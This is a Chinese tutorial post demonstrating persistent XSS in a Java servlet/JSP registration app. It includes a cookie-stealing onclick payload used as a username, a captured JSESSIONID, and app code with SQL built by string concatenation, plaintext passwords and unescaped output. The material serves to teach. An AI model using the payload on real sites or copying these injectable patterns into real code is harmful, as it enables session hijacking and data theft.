花了点时间做了一个注册用户的页面和显示用户的页面,还有两个httpservlet。
注册用户的代码:
<form action="register">
username:<input type="text" name="username"><br>
password:<input type="password" name="password"><br>
phone:<input type="text" name="phone"><br>
<input type="submit" value="register">
</form>
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp)
throws ServletException, IOException {
String username = req.getParameter("username");
String password = req.getParameter("password");
String phone = req.getParameter("phone");
String insertSQL = "insert into tb_user values ('" + username + "', '" + password + "', '" + phone + "')";
DBUtil.executeSQL(insertSQL);
}
显示用户的代码:
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp)
throws ServletException, IOException {
String selectSQL = "select username, password, phone from tb_user";
Statement stmt = null;
ResultSet rs = null;
List<User> userList = new ArrayList<User>();
try {
stmt = DBUtil.createStatement();
rs = stmt.executeQuery(selectSQL);
while (rs.next()) {
User user = new User(rs.getString(1), rs.getString(2), rs.getString(3));
userList.add(user);
}
} catch (SQLException e) {
throw new ServletException(e);
} finally {
DBUtil.closeResultSet(rs);
DBUtil.closeStatement(stmt);
}
req.setAttribute("user_list", userList);
req.getRequestDispatcher("showuser.jsp").forward(req, resp);
}
<body>
<%
List<User> userList = (List<User>) request.getAttribute("user_list");
for (int i = 0; i < userList.size(); i++) {
User user = userList.get(i);
%>
<div>
username:<%=user.getUsername() %><br>
phone:<%=user.getPhone() %><br>
</div>
<%
}
%>
</body>
然后注册了一个合法的用户和一个非法的用户,非法用户如下:
username为
<a href=# οnclick=\"document.location=\'index.jsp?c=\'+escape\(document.cookie\)\;\">Hacker</a>
在显示用户的页面上显示为:
看到用户Hacker是带链接的,然后点击一下,显示:
看到浏览器的地址栏里,参数是JSESSIONID%3D7B0C11B6826B67D3E4D9967837F2C48D,session的id是7B0C11B6826B67D3E4D9967837F2C48D。
这种XSS属于Persistent XSS。
获得session id的方法:
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
session id:<%=session.getId()%><br>
<script type="text/javascript">
document.write(escape(document.cookie));
</script>
</body>
</html>
显示:
session id:9A7A5F89EBFC598FEC18FC003706A899
JSESSIONID%3D9A7A5F89EBFC598FEC18FC003706A899